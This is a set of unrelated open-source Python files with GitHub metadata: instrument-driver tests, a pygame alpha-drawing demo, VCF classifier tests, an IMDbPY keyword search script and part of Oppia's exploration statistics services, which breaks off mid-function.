        McuStatusParticleKey.SAMPLE_VALVE3: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.SAMPLE_VALVE4: {TYPE: int, VALUE: 1, REQUIRED: True},
        McuStatusParticleKey.GROUND_RELAY_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.EXTERNAL_VALVE1_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.EXTERNAL_VALVE2_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.EXTERNAL_VALVE3_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.EXTERNAL_VALVE4_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.CAL_BAG1_MINUTES: {TYPE: int, VALUE: 10, REQUIRED: True},
        McuStatusParticleKey.CAL_BAG2_MINUTES: {TYPE: int, VALUE: 10, REQUIRED: True},
        McuStatusParticleKey.CAL_BAG3_MINUTES: {TYPE: int, VALUE: 1, REQUIRED: True},
        McuStatusParticleKey.NAFION_HEATER_STATUS: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.NAFION_HEATER1_POWER: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.NAFION_HEATER2_POWER: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.NAFION_CORE_TEMP: {TYPE: int, VALUE: 20, REQUIRED: True},
        McuStatusParticleKey.NAFION_ELAPSED_TIME: {TYPE: int, VALUE: 0, REQUIRED: True},
        McuStatusParticleKey.ION_CHAMBER_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
        McuStatusParticleKey.ION_CHAMBER_HEATER1_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
        McuStatusParticleKey.ION_CHAMBER_HEATER2_STATUS: {TYPE: int, VALUE: -1, REQUIRED: True},
    }
    def assert_mcu_status_particle(self, particle, verify_values=False):
        """
        Verify an MCU status particle: keys, header, and (optionally) values.
        @param particle: status data particle produced by the driver
        @param verify_values: when True also compare values against _status_parameters
        """
        self.assert_data_particle_keys(McuStatusParticleKey, self._status_parameters)
        self.assert_data_particle_header(particle, DataParticleType.MCU_STATUS)
        self.assert_data_particle_parameters(particle, self._status_parameters, verify_values)
###############################################################################
# UNIT TESTS #
# Unit tests test the method calls and parameters using Mock. #
# #
# These tests are especially useful for testing parsers and other data #
# handling. The tests generally focus on small segments of code, like a #
# single function call, but more complex code using Mock objects. However #
# if you find yourself mocking too much maybe it is better as an #
# integration test. #
# #
# Unit tests do not start up external processes like the port agent or #
# driver process. #
###############################################################################
# noinspection PyProtectedMember
@attr('UNIT', group='mi')
class DriverUnitTest(InstrumentDriverUnitTestCase, DriverTestMixinSub):
    def setUp(self):
        """Delegate to the base class unit-test setup."""
        InstrumentDriverUnitTestCase.setUp(self)
    def test_connect(self, initial_protocol_state=ProtocolState.COMMAND):
        """
        Verify driver can transition to the COMMAND state
        @param initial_protocol_state Desired initial protocol state
        @returns driver
        """
        driver = InstrumentDriver(self._got_data_event_callback)
        self.assert_initialize_driver(driver, initial_protocol_state)
        log.debug('Adding Mock side effect to connection.send')
        # Route all writes through my_send so canned responses come back.
        driver._connection.send.side_effect = self.my_send(driver)
        driver._protocol.set_init_params(mcu_startup_config)
        driver._protocol._init_params()
        return driver
    def test_driver_enums(self):
        """
        Verify that all driver enumeration has no duplicate values that might cause confusion. Also
        do a little extra validation for the Capabilities
        """
        self.assert_enum_has_no_duplicates(DataParticleType)
        self.assert_enum_has_no_duplicates(ProtocolState)
        self.assert_enum_has_no_duplicates(ProtocolEvent)
        self.assert_enum_has_no_duplicates(Parameter)
        self.assert_enum_has_no_duplicates(InstrumentCommand)
        self.assert_enum_has_no_duplicates(Prompt)
        # Test capabilities for duplicates, then verify that capabilities is a subset of protocol events
        self.assert_enum_has_no_duplicates(Capability)
        self.assert_enum_complete(Capability, ProtocolEvent)
    def test_capabilities(self):
        """
        Verify the FSM reports capabilities as expected.  All states defined in this dict must
        also be defined in the protocol FSM.
        """
        driver = InstrumentDriver(self._got_data_event_callback)
        self.assert_capabilities(driver, self._capabilities)
    def test_chunker(self):
        """
        Test the chunker
        """
        chunker = StringChunker(Protocol.sieve_function)
        chunks = [TELEGRAM_1]
        # Each telegram must be recognized whole, fragmented, with noise, and combined.
        for chunk in chunks:
            self.assert_chunker_sample(chunker, chunk + NEWLINE)
            self.assert_chunker_fragmented_sample(chunker, chunk + NEWLINE)
            self.assert_chunker_sample_with_noise(chunker, chunk + NEWLINE)
            self.assert_chunker_combined_sample(chunker, chunk + NEWLINE)
    def test_got_data(self):
        """
        Verify sample data passed through the got data method produces the correct data particles
        """
        driver = self.test_connect()
        # (telegram, should parse, should verify values)
        test_data = [
            (TELEGRAM_1, True, False),
            (TELEGRAM_2, True, True),
            (BAD_TELEGRAM_1, False, False),
            (BAD_TELEGRAM_2, False, False),
            (BAD_TELEGRAM_3, False, False),
        ]
        for sample, is_valid, verify in test_data:
            if is_valid:
                self.assert_particle_published(driver, sample + NEWLINE, self.assert_mcu_status_particle, verify)
            else:
                # Malformed telegrams must raise a SampleException.
                self.assert_particle_exception(driver, sample + NEWLINE)
    def test_sample_sequence(self):
        """
        Test the MCU ASAMPLE sequence handling
        """
        driver = self.test_connect()
        # Walk the FSM: START1 -> START2 -> SAMPLE, acknowledging each stage,
        # then STANDBY must land back in COMMAND.
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.START1)
        self._send_port_agent_packet(driver, Prompt.START1 + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.START2)
        self._send_port_agent_packet(driver, Prompt.START2 + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.SAMPLE)
        self._send_port_agent_packet(driver, Prompt.SAMPLE_FINISHED + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
    def test_cal_sequence(self):
        """
        Test the MCU ACAL9 sequence handling
        """
        driver = self.test_connect()
        # Same shape as the sample sequence, but through CALIBRATE.
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.START1)
        self._send_port_agent_packet(driver, Prompt.START1 + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.START2)
        self._send_port_agent_packet(driver, Prompt.START2 + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.CALIBRATE)
        self._send_port_agent_packet(driver, Prompt.CAL_FINISHED + NEWLINE)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
    def test_protocol_filter_capabilities(self):
        """
        This tests driver filter_capabilities.
        Iterate through available capabilities, and verify that they can pass successfully through the filter.
        Test silly made up capabilities to verify they are blocked by filter.
        """
        protocol = Protocol(Prompt, NEWLINE, Mock())
        driver_capabilities = Capability.list()
        test_capabilities = Capability.list()
        # Add a bogus capability that will be filtered out.
        test_capabilities.append("BOGUS_CAPABILITY")
        # Verify "BOGUS_CAPABILITY" was filtered out
        self.assertEquals(sorted(driver_capabilities),
                          sorted(protocol._filter_capabilities(test_capabilities)))
    def test_driver_schema(self):
        """
        get the driver schema and verify it is configured properly
        """
        driver = InstrumentDriver(self._got_data_event_callback)
        self.assert_driver_schema(driver, self._driver_parameters, self._driver_capabilities)
    def test_regen(self):
        """
        Verify we can start/stop the regen states
        """
        driver = self.test_connect()
        # Nafion regen: enter REGEN, then the finished prompt returns us to COMMAND.
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.NAFREG)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
        self._send_port_agent_packet(driver, Prompt.NAFREG_FINISHED + NEWLINE)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
        # Ion chamber regen: same pattern.
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.IONREG)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
        self._send_port_agent_packet(driver, Prompt.IONREG_FINISHED + NEWLINE)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
    def test_regen_stop(self):
        """
        Verify we can abort the regen states
        """
        driver = self.test_connect()
        # STANDBY aborts an in-progress regen without waiting for the finished prompt.
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.NAFREG)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.IONREG)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.REGEN)
        driver._protocol._protocol_fsm.on_event(ProtocolEvent.STANDBY)
        self.assertEqual(driver._protocol.get_current_state(), ProtocolState.COMMAND)
###############################################################################
# INTEGRATION TESTS #
# Integration test test the direct driver / instrument interaction #
# but making direct calls via zeromq. #
# - Common Integration tests test the driver through the instrument agent #
# and common for all drivers (minimum requirement for ION ingestion) #
###############################################################################
@attr('INT', group='mi')
class DriverIntegrationTest(InstrumentDriverIntegrationTestCase, DriverTestMixinSub):
    def setUp(self):
        """Delegate to the base class integration-test setup."""
        InstrumentDriverIntegrationTestCase.setUp(self)
    def test_connect(self):
        """
        Stand up the driver, transition to COMMAND
        """
        self.assert_initialize_driver()
    def test_get(self):
        """Verify every driver parameter reports its expected startup value."""
        self.assert_initialize_driver()
        for param in self._driver_parameters:
            self.assert_get(param, self._driver_parameters[param][self.VALUE])
    def test_set_and_bad_command(self):
        """
        Test setting of parameters, including exceptions for bad parameters/values.
        Test exception on receipt of bad command.
        Combined due to long startup time.
        """
        self.assert_initialize_driver()
        constraints = ParameterConstraint.dict()
        parameters = Parameter.dict()
        for key in constraints:
            _type, minimum, maximum = constraints[key]
            param = parameters[key]
            if not self._driver_parameters[param][self.READONLY]:
                # Writable: max is accepted, one past max is rejected.
                self.assert_set(param, maximum)
                self.assert_set_exception(param, maximum + 1)
            else:
                # Read-only parameters reject any set.
                self.assert_set_exception(param, maximum)
        self.assert_set_exception('BOGUS', 'CHEESE')
        self.assert_driver_command_exception('BAD_COMMAND', exception_class=InstrumentCommandException)
    def test_start1_and_data_particle(self):
        """
        Test sending the START1 command and data particle generation
        """
        self.assert_initialize_driver()
        self.assert_driver_command(Capability.START1)
        self.assert_state_change(ProtocolState.WAITING_TURBO, 60)
        # A status particle should arrive while waiting on the turbo.
        self.assert_async_particle_generation(DataParticleType.MCU_STATUS, self.assert_mcu_status_particle, timeout=60)
        self.assert_driver_command(Capability.STANDBY)
        self.assert_driver_command(Capability.POWEROFF)
    def test_regen(self):
        """
        Test the ion chamber and nafion regen commands
        """
        self.assert_initialize_driver()
        self.assert_driver_command(Capability.IONREG)
        self.assert_state_change(ProtocolState.REGEN, 5)
        self.assert_driver_command(Capability.STANDBY)
        self.assert_state_change(ProtocolState.COMMAND, 20)
        self.assert_driver_command(Capability.NAFREG)
        self.assert_state_change(ProtocolState.REGEN, 5)
        self.assert_driver_command(Capability.STANDBY)
        self.assert_state_change(ProtocolState.COMMAND, 20)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for doing final testing of ion #
# integration. They generally aren't used for instrument debugging and should #
# be tackled after all unit and integration tests are complete #
###############################################################################
@attr('QUAL', group='mi')
class DriverQualificationTest(InstrumentDriverQualificationTestCase, DriverTestMixinSub):
    def setUp(self):
        """Delegate to the base class qualification-test setup."""
        InstrumentDriverQualificationTestCase.setUp(self)
    def test_data_particle(self):
        """
        Test data particle generation
        """
        self.assert_enter_command_mode()
        self.assert_particle_async(DataParticleType.MCU_STATUS, self.assert_mcu_status_particle, timeout=90)
    def test_direct_access_telnet_mode(self):
        """
        This test manually tests that the Instrument Driver properly supports
        direct access to the physical instrument. (telnet mode)
        """
        self.assert_direct_access_start_telnet(session_timeout=180)
        self.assertTrue(self.tcp_client)
        # Heartbeat, then START1 through to standby, checking each prompt.
        self.tcp_client.send_data(InstrumentCommand.BEAT + NEWLINE)
        self.assertTrue(self.tcp_client.expect(Prompt.BEAT))
        self.tcp_client.send_data(InstrumentCommand.START1 + NEWLINE)
        self.assertTrue(self.tcp_client.expect(Prompt.OK))
        self.assertTrue(self.tcp_client.expect(Prompt.START1, max_retries=90))
        self.tcp_client.send_data(InstrumentCommand.STANDBY + NEWLINE)
        self.assertTrue(self.tcp_client.expect(Prompt.OK))
        self.assert_direct_access_stop_telnet()
    def test_discover(self):
        """
        Overridden, this driver does not have autosample
        """
        # Verify the agent is in command mode
        self.assert_enter_command_mode()
        # Now reset and try to discover.  This will stop the driver which holds the current
        # instrument state.
        self.assert_reset()
        self.assert_discover(ResourceAgentState.COMMAND)
    def test_reset(self):
        """
        Verify the agent can be reset
        Overridden, this driver does not have autosample.
        """
        self.assert_enter_command_mode()
        self.assert_reset()
        # Also verify reset works from direct access.
        self.assert_enter_command_mode()
        self.assert_direct_access_start_telnet(session_timeout=180)
        self.assert_state_change(ResourceAgentState.DIRECT_ACCESS, DriverProtocolState.DIRECT_ACCESS, 30)
        self.assert_reset()
    def test_get_capabilities(self):
        """
        Verify that the correct capabilities are returned from get_capabilities
        at various driver/agent states.
        We will only test command, direct_access and unknown, as we cannot reach all states with just the
        MCU driver.
        """
        self.assert_enter_command_mode()
        ##################
        #  Command Mode
        ##################
        capabilities = {
            AgentCapabilityType.AGENT_COMMAND: self._common_agent_commands(ResourceAgentState.COMMAND),
            AgentCapabilityType.AGENT_PARAMETER: self._common_agent_parameters(),
            AgentCapabilityType.RESOURCE_COMMAND: [
                ProtocolEvent.START1,
                ProtocolEvent.NAFREG,
                ProtocolEvent.IONREG,
                ProtocolEvent.POWEROFF,
            ],
            AgentCapabilityType.RESOURCE_INTERFACE: None,
            AgentCapabilityType.RESOURCE_PARAMETER: self._driver_parameters.keys()
        }
        self.assert_capabilities(capabilities)
        ##################
        #  DA Mode
        ##################
        capabilities[AgentCapabilityType.AGENT_COMMAND] = self._common_agent_commands(ResourceAgentState.DIRECT_ACCESS)
        capabilities[AgentCapabilityType.RESOURCE_COMMAND] = self._common_da_resource_commands()
        self.assert_direct_access_start_telnet()
        self.assert_capabilities(capabilities)
        self.assert_direct_access_stop_telnet()
        #######################
        #  Uninitialized Mode
        #######################
        capabilities[AgentCapabilityType.AGENT_COMMAND] = self._common_agent_commands(ResourceAgentState.UNINITIALIZED)
        capabilities[AgentCapabilityType.RESOURCE_COMMAND] = []
        capabilities[AgentCapabilityType.RESOURCE_INTERFACE] = []
        capabilities[AgentCapabilityType.RESOURCE_PARAMETER] = []
        self.assert_reset()
        self.assert_capabilities(capabilities)
    def test_direct_access_telnet_closed(self):
        """
        Test that we can properly handle the situation when a direct access
        session is launched, the telnet is closed, then direct access is stopped.
        OVERRIDDEN to extend timeout period to return to command.
        """
        self.assert_enter_command_mode()
        self.assert_direct_access_start_telnet(timeout=600)
        self.assertTrue(self.tcp_client)
        self.tcp_client.disconnect()
        self.assert_state_change(ResourceAgentState.COMMAND, DriverProtocolState.COMMAND, 90)
|
{
"content_hash": "1d0091ec168597051a34e20f61854853",
"timestamp": "",
"source": "github",
"line_count": 743,
"max_line_length": 119,
"avg_line_length": 48.799461641991925,
"alnum_prop": 0.6083622924595952,
"repo_name": "petercable/mi-instrument",
"id": "cc55daa93d2142f9969ff69b0d743f1f1e27ae33",
"size": "36258",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mi/instrument/harvard/massp/mcu/test/test_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "6415660"
}
],
"symlink_target": ""
}
|
"""Drawing with alpha values."""
####
import pygame
import os
####
def load_pic(name, path="data"):
    """Load image *name* from *path*, converted for fast blitting."""
    surface = pygame.image.load(os.path.join(path, name))
    # Images with per-pixel alpha need convert_alpha(); everything else
    # is converted to the plain display format.
    return surface.convert_alpha() if surface.get_alpha() else surface.convert()
####
def check(x, minval=0, maxval=255):
    """Clamp *x* into the inclusive range [minval, maxval]."""
    if x < minval:
        return minval
    if x > maxval:
        return maxval
    return x
####
def offset(len1, len2):
    """Return the non-negative start offset that centers len2 inside len1."""
    half_gap = (len1 - len2) // 2
    # Negative offsets (picture larger than window) collapse to zero.
    return half_gap if half_gap > 0 else 0
####
class PeepDemo(object):
    """Pygame demo: view a picture through concentric translucent 'holes'.

    Mouse motion steers the hole centers, the mouse wheel changes the
    number of holes, ESC or the window close button quits.
    """

    def __init__(self, conf):
        """Set up the window, surfaces and initial hole geometry from *conf*."""
        pygame.init()
        self.width = conf['width']
        self.height = conf['height']
        self.fps = conf['fps']
        self.screen = pygame.display.set_mode((self.width, self.height), pygame.DOUBLEBUF)
        self.clock = pygame.time.Clock()
        pygame.display.set_caption("Move Mouse and Scroll Mouse Wheel")
        self.pic = load_pic(conf['pic'])
        self.background = pygame.Surface(self.screen.get_size()).convert()
        self.background.fill(conf['backcol'])
        # Extra surface with per-pixel alpha for the translucent circles.
        self.alpha_surface = pygame.Surface(self.screen.get_size(), flags=pygame.SRCALPHA)
        # Center the picture inside the window.
        self.pic_offset = (offset(self.width, self.pic.get_width()),
                           offset(self.height, self.pic.get_height()))
        # init stuff for circles with alpha value
        self.center = self.width // 2, self.height // 2
        self.max_radius = min(self.width, self.height)
        self.hole_count = conf['holes']
        self.calc_centers(self.center, self.center, self.hole_count)
        self.calc_rad_alphas(self.max_radius, self.hole_count)

    def calc_rad_alphas(self, radius, n):
        """Calculate linear radius and alpha values for *n* circles."""
        assert 0 < n < 256, "Invalid number of holes!"
        rad_step = radius // n
        alpha_step = 256 // n
        pairs = []
        for i in range(n):
            pairs.append((radius - i * rad_step, 255 - i * alpha_step))
        self.rad_alphas = pairs

    def calc_centers(self, center, pos, holes):
        """Calculate center points stepping from *center* toward *pos*."""
        cx, cy = center
        px, py = pos
        step_x = (px - cx) // holes
        step_y = (py - cy) // holes
        self.centers = [(cx + step_x * i, cy + step_y * i) for i in range(holes)]

    def run(self):
        """Mainloop"""
        running = True
        while running:
            self.flip()
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
                    running = False
                elif event.type == pygame.MOUSEMOTION:
                    self.calc_centers(self.center, pygame.mouse.get_pos(),
                                      self.hole_count)
                elif event.type == pygame.MOUSEBUTTONDOWN and event.button in (4, 5):
                    # Mouse wheel: button 4 decrements, button 5 increments,
                    # clamped to the range [2, 64].
                    delta = 1 if event.button == 5 else -1
                    self.hole_count = check(self.hole_count + delta, 2, 64)
                    self.calc_rad_alphas(self.max_radius, self.hole_count)
                    self.calc_centers(self.center, pygame.mouse.get_pos(),
                                      self.hole_count)
            self.show()
        pygame.quit()

    def show(self):
        """Draw all."""
        # Picture first, then the alpha circles on top (largest first).
        self.screen.blit(self.pic, self.pic_offset)
        for (radius, alpha), circle_center in zip(self.rad_alphas, self.centers):
            pygame.draw.circle(self.alpha_surface, (0, 0, 0, alpha), circle_center, radius)
        self.screen.blit(self.alpha_surface, (0, 0))
        # Erase the alpha surface so next frame starts clean.
        self.alpha_surface.fill((0, 0, 0))

    def flip(self):
        """Show drawing and erase."""
        pygame.display.flip()
        self.screen.blit(self.background, (0, 0))
        self.clock.tick(self.fps)
####
# Demo configuration: window geometry, background color, frame rate,
# picture filename (loaded from the data/ directory) and the initial
# number of alpha holes.
CONFIG = {'width': 800,
          'height': 600,
          'backcol': (255, 0, 0),
          'fps': 100,
          'fontsize': 18,
          'pic': 'ente.jpg',
          'holes': 7}
####
if __name__ == "__main__":
    PeepDemo(CONFIG).run()
|
{
"content_hash": "a2d5941bbf3d06463cc9ac0c5f4b793c",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 90,
"avg_line_length": 29.375,
"alnum_prop": 0.5295508274231678,
"repo_name": "yipyip/Pygame-Examples",
"id": "de8971f17fadf454091967f8fab9a75e671e287b",
"size": "4255",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "peep.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "45622"
}
],
"symlink_target": ""
}
|
import os
import pytest
from VCF.VCFfilter.MLclassifier import MLclassifier
def test_train_snps(datadir):
    """
    Train the model for SNPs
    """
    classifier = MLclassifier()
    prefix = "{0}/outdir/fitted_logreg_snps".format(datadir)
    tp_file = "{0}/TP_annotations_snps.chr20.tsv".format(datadir)
    fp_file = "{0}/FP_annotations_snps.chr20.tsv".format(datadir)
    trained = classifier.train(outprefix=prefix,
                               tp_annotations=tp_file,
                               fp_annotations=fp_file)
    assert os.path.isfile(trained) is True
def test_train_snps_gz(datadir):
    """
    Train the model for SNPs using 2 gzipped annotation files
    """
    ML_obj = MLclassifier()
    outfile = ML_obj.train(outprefix="{0}/outdir/fitted_logreg_snps".format(datadir),
                           tp_annotations="{0}/TP_annotations_snps.chr20.tsv.gz".format(datadir),
                           fp_annotations="{0}/FP_annotations_snps.chr20.tsv.gz".format(datadir))
    # Previously `outfile` was never checked, so the test passed even if no
    # model file was written; assert the same way the sibling tests do.
    assert os.path.isfile(outfile) is True
def test_train_indels(datadir):
    """
    Train the model for INDELs
    """
    ML_obj = MLclassifier()
    # NOTE(review): fp_annotations below points at the TP annotations file —
    # this looks like a copy-paste slip (an FP_annotations_indels file would
    # be expected); confirm whether reusing the TP data is intentional.
    outfile = ML_obj.train(outprefix="{0}/outdir/fitted_logreg_indels".format(datadir),
                           tp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
                           fp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir))
    assert os.path.isfile(outfile) is True
def test_apply_model(clean_tmp, datadir):
    """Apply a previously fitted model and check a predictions file is written."""
    model_path = "{0}/outdir/fitted_logreg_snps.sav".format(datadir)
    classifier = MLclassifier(fitted_model=model_path)
    predictions = classifier.predict(outprefix="{0}/outdir/predictions".format(datadir),
                                     annotation_f="{0}/TP_annotations_snps.chr20.tsv".format(datadir),
                                     cutoff=0.95)
    assert os.path.isfile(predictions) is True
def test_rfe(datadir, clean_tmp):
    # Run recursive feature elimination and check the report file is written.
    ML_obj = MLclassifier()
    # NOTE(review): fp_annotations reuses the TP annotations file here, same
    # as in test_train_indels — confirm this is intended test data reuse.
    select_feats_report = ML_obj.rfe(tp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
                                     fp_annotations="{0}/TP_annotations_indels.chr20.tsv".format(datadir),
                                     n_features=5,
                                     outreport="{0}/outdir/out_rfe.txt".format(datadir))
    assert os.path.isfile(select_feats_report) is True
|
{
"content_hash": "92ac744baf13c95ef63c531656c7b2e6",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 106,
"avg_line_length": 36.3728813559322,
"alnum_prop": 0.6346691519105312,
"repo_name": "igsr/igsr_analysis",
"id": "b9ed400a9cde0dad246b4468319eb8db4bd9a471",
"size": "2146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_MLclassifier.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3784"
},
{
"name": "Jupyter Notebook",
"bytes": "1784167"
},
{
"name": "Nextflow",
"bytes": "116144"
},
{
"name": "Perl",
"bytes": "280174"
},
{
"name": "Python",
"bytes": "532139"
},
{
"name": "R",
"bytes": "882"
}
],
"symlink_target": ""
}
|
"""
get_keyword.py

Usage: get_keyword "keyword"

search for movies tagged with the given keyword and print the results.

NOTE: this script is written in Python 2 (print statements, ``unicode``,
``except Exc, e`` syntax) and will not run under Python 3.
"""
import sys
# Import the IMDbPY package.
try:
    import imdb
except ImportError:
    print 'You bad boy!  You need to install the IMDbPY package!'
    sys.exit(1)
if len(sys.argv) != 2:
    print 'Only one argument is required:'
    print '  %s "keyword"' % sys.argv[0]
    sys.exit(2)
name = sys.argv[1]
i = imdb.IMDb()
# Terminal encodings for decoding argv and encoding printed output; fall
# back to the interpreter default when the streams report none (e.g. pipes).
in_encoding = sys.stdin.encoding or sys.getdefaultencoding()
out_encoding = sys.stdout.encoding or sys.getdefaultencoding()
name = unicode(name, in_encoding, 'replace')
try:
    # Do the search, and get the results (a list of movies).
    results = i.get_keyword(name, results=20)
except imdb.IMDbError, e:
    print "Probably you're not connected to Internet.  Complete error report:"
    print e
    sys.exit(3)
# Print the results.
print '    %s result%s for "%s":' % (len(results),
                                     ('', 's')[len(results) != 1],
                                     name.encode(out_encoding, 'replace'))
print ' : movie title'
# Print the long imdb title for every movie.
for idx, movie in enumerate(results):
    outp = u'%d: %s' % (idx+1, movie['long imdb title'])
    print outp.encode(out_encoding, 'replace')
|
{
"content_hash": "d2ec0ba0a2696f44011b29902d2e4d43",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 78,
"avg_line_length": 24.903846153846153,
"alnum_prop": 0.633976833976834,
"repo_name": "andurilhuang/Movie_Income_Prediction",
"id": "becbf03e44d8776148dbfed15366e9dc32eef85a",
"size": "1317",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "paper/historycode/IMDbPY-5.1.1/bin/get_keyword.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7150"
},
{
"name": "Jupyter Notebook",
"bytes": "1286755"
},
{
"name": "Python",
"bytes": "901375"
},
{
"name": "Shell",
"bytes": "5368"
}
],
"symlink_target": ""
}
|
"""Services for exploration-related statistics."""
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import stats_domain
from core.domain import stats_jobs_continuous
from core.platform import models
(stats_models,) = models.Registry.import_models([models.NAMES.statistics])
IMPROVE_TYPE_DEFAULT = 'default'
IMPROVE_TYPE_INCOMPLETE = 'incomplete'
# TODO(bhenning): Everything is handler name submit; therefore, it is
# pointless and should be removed.
_OLD_SUBMIT_HANDLER_NAME = 'submit'
def get_top_unresolved_answers_for_default_rule(exploration_id, state_name):
    """Return a dict mapping each of the top 3 unresolved default-rule
    answers for the given state to its submission count."""
    answer_log = stats_domain.StateRuleAnswerLog.get(
        exploration_id, state_name, exp_domain.DEFAULT_RULESPEC_STR)
    return dict(answer_log.get_top_answers(3))
def get_exps_unresolved_answers_for_default_rule(exp_ids):
    """Gets unresolved answers per exploration for default rule across all
    states for explorations with ids in exp_ids. The value of total count
    should match the sum of values of individual counts for each unresolved
    answer.

    TODO(526avijitgupta): Note that this method currently returns the data only
    for the DEFAULT rule. This should ideally handle all types of unresolved
    answers.

    Returns a dict of the following format:
        {
          'exp_id_1': {
            'count': 7 (number of unresolved answers for this exploration),
            'unresolved_answers': (list of unresolved answers sorted by count)
              [
                {'count': 4, 'value': 'answer_1', 'state': 'Introduction'},
                {'count': 2, 'value': 'answer_2', 'state': 'Introduction'},
                {'count': 1, 'value': 'answer_3', 'state': 'End'}
              ]
          },
          'exp_id_2': {
            'count': 13,
            'unresolved_answers':
              [
                {'count': 8, 'value': 'answer_5', 'state': 'Introduction'},
                {'count': 3, 'value': 'answer_4', 'state': 'Quest'},
                {'count': 1, 'value': 'answer_6', 'state': 'End'}
                {'count': 1, 'value': 'answer_8', 'state': 'End'}
              ]
          }
        }
    """
    def _get_explorations_states_tuples_by_ids(exp_ids):
        """Returns a list of all (exp_id, state_name) tuples for the given
        exp_ids.
        E.g. - [
            ('eid1', 'Introduction'),
            ('eid1', 'End'),
            ('eid2', 'Introduction'),
            ('eid3', 'Introduction')
        ]
        when exp_ids = ['eid1', 'eid2', 'eid3'].
        """
        explorations = (
            exp_services.get_multiple_explorations_by_id(exp_ids, strict=False))
        return [
            (exploration.id, state_name)
            for exploration in explorations.values()
            for state_name in exploration.states
        ]
    explorations_states_tuples = _get_explorations_states_tuples_by_ids(exp_ids)
    # exploration_states_answers_list is positionally aligned with
    # explorations_states_tuples: entry i holds the answers for tuple i.
    exploration_states_answers_list = get_top_state_rule_answers_multi(
        explorations_states_tuples, [exp_domain.DEFAULT_RULESPEC_STR])
    exps_answers_mapping = {}
    # Aggregate per-state answers into a per-exploration bucket, tagging each
    # answer dict with the state it came from.
    for ind, statewise_answers in enumerate(exploration_states_answers_list):
        exp_id = explorations_states_tuples[ind][0]
        if exp_id not in exps_answers_mapping:
            exps_answers_mapping[exp_id] = {
                'count': 0,
                'unresolved_answers': []
            }
        for answer in statewise_answers:
            exps_answers_mapping[exp_id]['count'] += answer['count']
            answer['state'] = explorations_states_tuples[ind][1]
        exps_answers_mapping[exp_id]['unresolved_answers'].extend(
            statewise_answers)
    # Sort each exploration's answers by descending submission count.
    for exp_id in exps_answers_mapping:
        exps_answers_mapping[exp_id]['unresolved_answers'] = (sorted(
            exps_answers_mapping[exp_id]['unresolved_answers'],
            key=lambda a: a['count'],
            reverse=True))
    return exps_answers_mapping
def get_state_rules_stats(exploration_id, state_name):
    """Gets statistics for the answer groups and rules of this state.

    Returns:
        A dict, keyed by the string '{HANDLER_NAME}.{RULE_STR}', whose
        values are dicts with two keys: 'answers' (the top 5 answers logged
        for that rule) and 'rule_hits' (the total answer count for it).
    """
    exploration = exp_services.get_exploration_by_id(exploration_id)
    state = exploration.states[state_name]
    # One (handler, rule string) key per rule spec, plus one for the default
    # outcome if present. Order matters: answer_logs below is positionally
    # aligned with rule_keys.
    rule_keys = []
    for group in state.interaction.answer_groups:
        for rule in group.rule_specs:
            rule_keys.append((
                _OLD_SUBMIT_HANDLER_NAME, rule.stringify_classified_rule()))
    if state.interaction.default_outcome:
        rule_keys.append((
            _OLD_SUBMIT_HANDLER_NAME, exp_domain.DEFAULT_RULESPEC_STR))
    answer_logs = stats_domain.StateRuleAnswerLog.get_multi(
        exploration_id, [{
